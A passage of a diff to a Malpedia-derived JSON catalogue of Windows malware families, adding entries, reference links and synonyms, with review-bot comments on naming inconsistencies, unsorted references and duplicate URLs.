+ "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf"
 ],
 "synonyms": [],
 "type": []
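Review bot: The new InnfiRAT entry sets `"value": "win.innfirat"`, the Malpedia identifier, while every other entry in these hunks uses the family's display name (`"value": "Interception"`, `"value": "InvisiMole"`), so the galaxy will show the raw id as the cluster name; the Jason hunk has the same problem in milder form, with `"value": "jason"` in lower case while its own description spells the tool "Jason". The InnfiRAT description also spells the family three different ways (InnifiRAT, InffiRAT, innfirat) and carries typos ("it's top priority", "loggin key stroke"). Since this file is synced from the Malpedia API the wording belongs upstream, but a post-sync check that no `value` matches the platform-prefixed id form (`win.`, `apk.`, ...) would catch the naming slip before it is committed.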
@@ -9802,13 +18395,28 @@
 "value": "InvisiMole"
 },
 {
- "description": " IRONHALO is a downloader that uses the HTTP protocol to retrieve a Base64 encoded payload from a hard-coded command-and-control (CnC) server and uniform resource locator (URL) path.\r\n The encoded payload is written to a temporary file, decoded and executed in a hidden window. The encoded and decoded payloads are written to files named igfxHK[%rand%].dat and igfxHK[%rand%].exe respectively, where [%rand%] is a 4-byte hexadecimal number based on the current timestamp. It persists by copying itself to the current user’s Startup folder.",
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ironcat",
+ "https://aaronrosenmund.com/blog/2020/09/26/ironcat-ransmoware/",
+ "https://twitter.com/demonslay335/status/1308827693312548864"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "c6fc8419-afb1-4e99-a6cf-4288ead2381b",
+ "value": "Ironcat"
+ },
+ {
+ "description": " IRONHALO is a downloader that uses the HTTP protocol to retrieve a Base64 encoded payload from a hard-coded command-and-control (CnC) server and uniform resource locator (URL) path.\r\n The encoded payload is written to a temporary file, decoded and executed in a hidden window. The encoded and decoded payloads are written to files named igfxHK[%rand%].dat and igfxHK[%rand%].exe respectively, where [%rand%] is a 4-byte hexadecimal number based on the current timestamp. It persists by copying itself to the current user\u2019s Startup folder.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ironhalo",
 "https://www.symantec.com/security-center/writeup/2015-122210-5128-99",
+ "https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html",
 "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html",
- "https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html"
+ "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko"
 ],
 "synonyms": [],
 "type": []
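Review bot: The `refs` array is written in an unstable order, so this hunk removes `"https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html"` and adds the identical line two positions earlier; the same remove-and-re-add churn appears in the ISFB hunk (the vkremez, cyberbit and cybereason lines), the KeyBoy hunk (the pwc line) and the Infy hunk, and inflates the diff without changing content. Sorting `refs` and `synonyms` before writing the file would keep future diffs to real changes. The generator also does not de-duplicate: the Infy hunk now carries both the `http://` and `https://` form of the same Palo Alto "prince-of-persia-infy-malware" URL, and the last KleptoParasite hunk, which continues past this view, adds `"https://malpedia.caad.fkie.fraunhofer.de/details/win.kleptoparasite_stealer"` directly above the existing identical entry. De-duplicating on the URL with the scheme normalised would address both.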
@@ -9822,28 +18430,65 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.isfb",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/",
+ "https://www.fortinet.com/blog/threat-research/new-variant-of-ursnif-continuously-targeting-italy",
 "https://blog.talosintelligence.com/2019/01/amp-tracks-ursnif.html",
 "https://blog.minerva-labs.com/attackers-insert-themselves-into-the-email-conversation-to-spread-malware",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/",
 "https://lokalhost.pl/gozi_tree.txt",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf",
 "https://isc.sans.edu/forums/diary/Reviewing+the+spam+filters+Malspam+pushing+GoziISFB/23245",
+ "https://www.fidelissecurity.com/threatgeek/threat-intelligence/gozi-v3-technical-update/",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
 "http://blog.talosintelligence.com/2018/03/gozi-isfb-remains-active-in-2018.html",
 "https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/",
+ "https://www.cyberbit.com/new-ursnif-malware-variant/",
 "https://www.cylance.com/en_us/blog/threat-spotlight-ursnif-infostealer-malware.html",
- "https://www.vkremez.com/2018/08/lets-learn-in-depth-reversing-of-recent.html",
+ "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware",
 "https://www.youtube.com/watch?v=KvOpNznu_3w",
- "https://www.rsa.com/de-de/resources/pandemiya-emerges-new-malware-alternative-zeus-based",
+ "https://blog.yoroi.company/research/ursnif-long-live-the-steganography/",
+ "https://0xc0decafe.com/malware-analysts-guide-to-aplib-decompression/",
 "https://www.youtube.com/watch?v=jlc7Ahp8Iqg",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://news.sophos.com/en-us/2019/12/24/gozi-v3-tracked-by-their-own-stealth/",
 "http://benkow.cc/DreambotSAS19.pdf",
+ "https://malware.love/malware_analysis/reverse_engineering/2020/11/27/analyzing-a-vbs-dropper.html",
 "https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/",
- "https://www.cyberbit.com/blog/endpoint-security/new-ursnif-malware-variant/",
+ "https://blog.talosintelligence.com/2020/07/valak-emerges.html",
+ "https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/",
 "https://journal.cecyf.fr/ojs/index.php/cybin/article/view/15",
 "https://0ffset.net/reverse-engineering/analyzing-com-mechanisms-in-malware/",
+ "https://www.vkremez.com/2018/08/lets-learn-in-depth-reversing-of-recent.html",
+ "https://isc.sans.edu/forums/diary/German+language+malspam+pushes+Ursnif/25732/",
+ "https://0ffset.net/reverse-engineering/malware-analysis/analyzing-isfb-second-loader/",
+ "https://unit42.paloaltonetworks.com/wireshark-tutorial-examining-ursnif-infections/",
+ "https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization",
 "https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html",
+ "https://www.tgsoft.it/files/report/download.asp?id=568531345",
+ "https://blog.yoroi.company/research/the-ursnif-gangs-keep-threatening-italy/",
+ "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
 "https://0ffset.net/reverse-engineering/malware-analysis/analysing-isfb-loader/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
+ "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf",
+ "https://www.hornetsecurity.com/en/security-information/firefox-send-sends-ursnif-malware/",
 "https://arielkoren.com/blog/2016/11/01/ursnif-malware-deep-technical-dive/",
+ "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update",
+ "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them",
+ "https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/",
+ "https://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html",
 "https://github.com/gbrindisi/malware/tree/master/windows/gozi-isfb",
+ "https://www.cyberbit.com/blog/endpoint-security/new-ursnif-malware-variant/",
 "https://blog.yoroi.company/research/ursnif-the-latest-evolution-of-the-most-popular-banking-malware/",
- "https://www.cybereason.com/blog/new-ursnif-variant-targets-japan-packed-with-new-features"
+ "https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex",
+ "https://redcanary.com/resources/webinars/deep-dive-process-injection/",
+ "https://www.cybereason.com/blog/new-ursnif-variant-targets-japan-packed-with-new-features",
+ "https://www.tgsoft.it/files/report/download.asp?id=7481257469",
+ "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/",
+ "https://github.com/mlodic/ursnif_beacon_decryptor",
+ "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/",
+ "https://research.checkpoint.com/2020/gozi-the-malware-with-a-thousand-faces/",
+ "https://blog.morphisec.com/ursnif/gozi-delivery-excel-macro-4.0-utilization-uptick-ocr-bypass"
 ],
 "synonyms": [
 "Gozi ISFB",
@@ -9860,6 +18505,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismagent",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia",
 "http://www.clearskysec.com/ismagent/",
 "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/"
 ],
@@ -9874,8 +18520,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismdoor",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia",
 "http://www.clearskysec.com/greenbug/",
- "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon"
+ "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon",
+ "https://web.archive.org/web/20190331181353/https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon"
 ],
 "synonyms": [],
 "type": []
@@ -9888,7 +18536,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ispy_keylogger",
- "https://www.zscaler.com/blogs/research/ispy-keylogger"
+ "https://www.zscaler.com/blogs/research/ispy-keylogger",
+ "https://www.secureworks.com/research/threat-profiles/gold-skyline"
 ],
 "synonyms": [],
 "type": []
@@ -9927,9 +18576,15 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.isspace",
- "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/"
+ "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/",
+ "https://wikileaks.org/vault7/document/2015-09-20150911-280-CSIT-15085-NfLog/2015-09-20150911-280-CSIT-15085-NfLog.pdf",
+ "https://unit42.paloaltonetworks.com/watering-hole-attack-on-aerospace-firm-exploits-cve-2015-5122-to-install-isspace-backdoor/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-overbrook",
+ "https://www.secureworks.com/research/threat-profiles/bronze-express"
+ ],
+ "synonyms": [
+ "NfLog RAT"
 ],
- "synonyms": [],
 "type": []
 },
 "uuid": "a3f41c96-a5c8-4dfe-b7fa-d9d75f97979a",
@@ -9939,8 +18594,20 @@
 "description": "",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.jackpos",
- "https://www.trustwave.com/Resources/SpiderLabs-Blog/JackPOS-%E2%80%93-The-House-Always-Wins/"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ixware",
+ "https://fr3d.hk/blog/ixware-kids-will-be-skids"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "5710dffa-ec02-4e5c-848e-47af13f729d7",
+ "value": "IXWare"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jackpos"
 ],
 "synonyms": [],
 "type": []
@@ -9953,9 +18620,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.jaff",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
 "http://malware-traffic-analysis.net/2017/05/16/index.html",
 "https://www.proofpoint.com/us/threat-insight/post/jaff-new-ransomware-from-actors-behind-distribution-of-dridex-locky-bart",
- "http://blog.talosintelligence.com/2017/05/jaff-ransomware.html"
+ "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/"
 ],
 "synonyms": [],
 "type": []
@@ -9994,6 +18662,22 @@
 "uuid": "0f02ea79-5833-46e0-8458-c4a863a5a112",
 "value": "Jaku"
 },
+ {
+ "description": "Jason is a graphic tool implemented to perform Microsoft exchange account brute-force in order to \u201charvest\u201d the highest possible emails and accounts information. Distributed in a ZIP container the interface is quite intuitive: the Microsoft exchange address and its version shall be provided. Three brute-force methods could be selected: EWS (Exchange Web Service), OAB (Offline Address Book) or both (All). Username and password list can be selected and threads number should be provided in order to optimize the attack balance.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jason",
+ "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy",
+ "https://marcoramilli.com/2019/06/06/apt34-jason-project/",
+ "https://twitter.com/P3pperP0tts/status/1135503765287657472",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "e101a605-c30f-4222-9549-4745d0d769cd",
+ "value": "jason"
+ },
 {
 "description": "",
 "meta": {
@@ -10021,6 +18705,38 @@
 "uuid": "fea703ec-9b24-4119-96b3-7ae6bec3b203",
 "value": "JCry"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jeno",
+ "https://id-ransomware.blogspot.com/2020/04/jeno-ransomware.html"
+ ],
+ "synonyms": [
+ "Jest",
+ "Valeria"
+ ],
+ "type": []
+ },
+ "uuid": "a1d7e117-4ca9-4d67-a4dd-53626827ed2f",
+ "value": "Jeno Ransomware"
+ },
+ {
+ "description": "Cisco Talos identified JhoneRAT in January 2020. The RAT is delivered through cloud services (Google Drive) and also submits stolen data to them (Google Drive, Twitter, ImgBB, GoogleForms). The actors using JhoneRAT target Saudi Arabia, Iraq, Egypt, Libya, Algeria, Morocco, Tunisia, Oman, Yemen, Syria, UAE, Kuwait, Bahrain and Lebanon.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jhone_rat",
+ "https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/",
+ "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf",
+ "https://blog.talosintelligence.com/2020/01/jhonerat.html",
+ "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "6dd8c953-f500-46dd-bacf-78772222f011",
+ "value": "JhoneRAT"
+ },
 {
 "description": "",
 "meta": {
@@ -10052,8 +18768,14 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.joanap",
 "https://www.us-cert.gov/ncas/alerts/TA18-149A",
+ "https://www.secureworks.com/research/threat-profiles/nickel-academy",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/",
 "https://www.us-cert.gov/ncas/analysis-reports/AR18-149A",
- "https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/"
+ "https://app.box.com/s/xyyord0b806e6or2nh92coxw2areyyx4",
+ "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5b9850b9-0fdd-48a9-b595-9234207ae7df&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware"
 ],
 "synonyms": [],
 "type": []
@@ -10105,7 +18827,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.jripbot",
- "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
+ "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -10113,6 +18836,78 @@
 "uuid": "e895a0d2-fe4b-4793-9440-9db2d56a97f2",
 "value": "JripBot"
 },
+ {
+ "description": "JSOutProx is a sophisticated attack framework built using both Javascript and .NET. It uses the .NET (de)serialization feature to interact with a Javascript file which is the core module running on a victim machine. Once the malware is run on the victim, the framework can load several plugins performing additional malicious activities on the target.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jsoutprox",
+ "https://blog.yoroi.company/research/unveiling-jsoutprox-a-new-enterprise-grade-implant/",
+ "https://twitter.com/zlab_team/status/1208022180241530882",
+ "https://www.zscaler.com/blogs/research/targeted-attacks-indian-government-and-financial-institutions-using-jsoutprox-rat",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.fortinet.com/blog/threat-research/adversary-playbook-javascript-rat-looking-for-that-government-cheese"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "5e4fbe90-c043-4ac3-9fd5-d9e7d9bb173f",
+ "value": "JSOutProx"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jssloader",
+ "https://www.morphisec.com/hubfs/eBooks_and_Whitepapers/FIN7%20JSSLOADER%20FINAL%20WEB.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "5db89188-568d-40d2-9320-5fb4a06fbd51",
+ "value": "JSSLoader"
+ },
+ {
+ "description": "As described on the Github repository page, \"A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\\SYSTEM\".",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.juicy_potato",
+ "https://github.com/ohpe/juicy-potato",
+ "https://lifars.com/wp-content/uploads/2020/06/Cryptocurrency-Miners-XMRig-Based-CoinMiner-by-Blue-Mockingbird-Group.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "4dc0dccf-ac68-4464-b193-6519ffe00617",
+ "value": "JuicyPotato"
+ },
+ {
+ "description": "According to FireEye, JUMPALL is a malware dropper that has been observed \r\ndropping HIGHNOON/ZXSHELL/SOGU.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jumpall",
+ "https://content.fireeye.com/apt-41/rpt-apt41/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "a08db33d-4c37-4075-bd49-c3ab66a339db",
+ "value": "JUMPALL"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jupyter",
+ "https://redcanary.com/blog/yellow-cockatoo/",
+ "https://blog.morphisec.com/jupyter-infostealer-backdoor-introduction",
+ "https://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "5b834445-4437-46a6-9d4d-673ecf4bf1b9",
+ "value": "Jupyter Stealer"
+ },
 {
 "description": "",
 "meta": {
@@ -10131,9 +18926,15 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.karagany",
- "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
+ "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group",
+ "https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector",
+ "https://www.secureworks.com/research/threat-profiles/iron-liberty",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks",
+ "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2014/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf"
+ ],
+ "synonyms": [
+ "Karagny"
 ],
- "synonyms": [],
 "type": []
 },
 "uuid": "857e61fe-ccb2-426b-ad7b-696112f48dbb",
@@ -10172,9 +18973,15 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.karkoff",
- "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html"
+ "https://www.secureworks.com/research/threat-profiles/cobalt-edgewater",
+ "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html",
+ "https://blog.yoroi.company/research/karkoff-2020-a-new-apt34-espionage-operation-involves-lebanon-government/",
+ "https://blog.telsy.com/apt34-aka-oilrig-attacks-lebanon-government-entities-with-maildropper-implant/"
+ ],
+ "synonyms": [
+ "CACTUSPIPE",
+ "MailDropper"
 ],
- "synonyms": [],
 "type": []
 },
 "uuid": "a45c16d9-6945-428c-af46-0436903f9329",
@@ -10199,7 +19006,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kazuar",
- "http://researchcenter.paloaltonetworks.com/2017/05/unit42-kazuar-multiplatform-espionage-backdoor-api-access/"
+ "https://www.epicturla.com/blog/sysinturla",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity",
+ "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "http://researchcenter.paloaltonetworks.com/2017/05/unit42-kazuar-multiplatform-espionage-backdoor-api-access/",
+ "https://securelist.com/sunburst-backdoor-kazuar/99981/"
 ],
 "synonyms": [],
 "type": []
@@ -10211,7 +19023,8 @@
 "description": "",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.kegotip"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kegotip",
+ "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/"
 ],
 "synonyms": [],
 "type": []
@@ -10219,14 +19032,31 @@
 "uuid": "96bb088c-7bb7-4a07-a9d7-a3cbb45d5755",
 "value": "Kegotip"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kekw",
+ "https://id-ransomware.blogspot.com/2020/03/kekw-ransomware.html"
+ ],
+ "synonyms": [
+ "KEKW-Locker"
+ ],
+ "type": []
+ },
+ "uuid": "b178de96-14a3-49f1-a957-c83f86e23e83",
+ "value": "KEKW Ransomware"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kelihos",
 "https://www.crowdstrike.com/blog/inside-the-takedown-of-zombie-spider-and-the-kelihos-botnet/",
- "https://www.wired.com/2017/04/fbi-took-russias-spam-king-massive-botnet/",
 "https://www.cyberscoop.com/doj-kelihos-botnet-peter-levashov-severa/",
+ "https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf",
+ "https://www.wired.com/2017/04/fbi-took-russias-spam-king-massive-botnet/",
+ "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/",
 "https://en.wikipedia.org/wiki/Kelihos_botnet"
 ],
 "synonyms": [],
@@ -10240,8 +19070,18 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kerrdown",
+ "https://norfolkinfosec.com/jeshell-an-oceanlotus-apt32-backdoor/",
+ "https://tradahacking.vn/th%C6%B0%E1%BB%9Fng-t%E1%BA%BFt-fbcbbed49da7",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2020-1110.pdf",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
 "https://unit42.paloaltonetworks.com/tracking-oceanlotus-new-downloader-kerrdown/",
- "https://blog.cystack.net/word-based-malware-attack/"
+ "https://www.amnesty.de/sites/default/files/2021-02/Amnesty-Bericht-Vietnam-Click-And-Bait-Blogger-Deutschland-Spionage-Menschenrechtsverteidiger-Februar-2021.pdf",
+ "https://blog.cystack.net/word-based-malware-attack/",
+ "https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/",
+ "https://www.secureworks.com/research/threat-profiles/tin-woodlawn",
+ "https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam"
 ],
 "synonyms": [],
 "type": []
@@ -10249,6 +19089,35 @@
 "uuid": "bd9e21d1-7da3-4699-816f-0e368a63bc18",
 "value": "KerrDown"
 },
+ {
+ "description": "Ketrican is a backdoor trojan used by APT 15.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ketrican",
+ "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/",
+ "https://www.welivesecurity.com/2019/07/18/okrum-ke3chang-targets-diplomatic-missions/",
+ "https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf",
+ "https://www.intezer.com/blog/research/the-evolution-of-apt15s-codebase-2020/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "86cd2563-b343-4cce-ac2d-a17afbc77dfd",
+ "value": "Ketrican"
+ },
+ {
+ "description": "Intezer found this family mid May 2020, which appears to be a merger of the family Ketrican and Okrum.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ketrum",
+ "https://www.intezer.com/blog/research/the-evolution-of-apt15s-codebase-2020/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "99d6cb80-bae2-4a97-8ec7-401f9570f237",
+ "value": "Ketrum"
+ },
 {
 "description": "KeyBase is a .NET credential stealer and keylogger that first emerged in February 2015. It often incorporates Nirsoft tools such as MailPassView and WebBrowserPassView for additional credential grabbing.",
 "meta": {
@@ -10277,8 +19146,9 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.keyboy",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/",
 "https://citizenlab.ca/2016/11/parliament-keyboy/",
- "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/the-keyboys-are-back-in-town.html",
- "https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/"
+ "https://www.secureworks.com/research/threat-profiles/bronze-hobart",
+ "https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/",
+ "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/the-keyboys-are-back-in-town.html"
 ],
 "synonyms": [
 "TSSL"
@@ -10309,6 +19179,8 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.keymarble",
 "https://www.us-cert.gov/ncas/analysis-reports/AR18-221A",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
 "https://research.checkpoint.com/north-korea-turns-against-russian-targets/"
 ],
 "synonyms": [],
@@ -10317,13 +19189,27 @@
 "uuid": "0c213d7f-8c71-4341-aeb0-13be71fbf4e5",
 "value": "KEYMARBLE"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kgh_spy",
+ "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "d073b11a-a941-48b9-8e88-b59ffab9fcda",
+ "value": "KGH_SPY"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.khrat",
+ "https://www.forcepoint.com/de/blog/x-labs/trojanized-adobe-installer-used-install-dragonok-s-new-custom-backdoor",
 "https://researchcenter.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/",
- "https://blogs.forcepoint.com/security-labs/trojanized-adobe-installer-used-install-dragonok%E2%80%99s-new-custom-backdoor"
+ "https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/"
 ],
 "synonyms": [],
 "type": []
@@ -10349,6 +19235,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.killdisk",
+ "https://www.secureworks.com/research/threat-profiles/iron-viking",
+ "https://www.welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/",
 "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-financial-organizations-in-latin-america/"
 ],
@@ -10358,13 +19246,46 @@
 "uuid": "e81f3e3f-966c-4c99-8d4b-fc0a1d3bb027",
 "value": "KillDisk"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
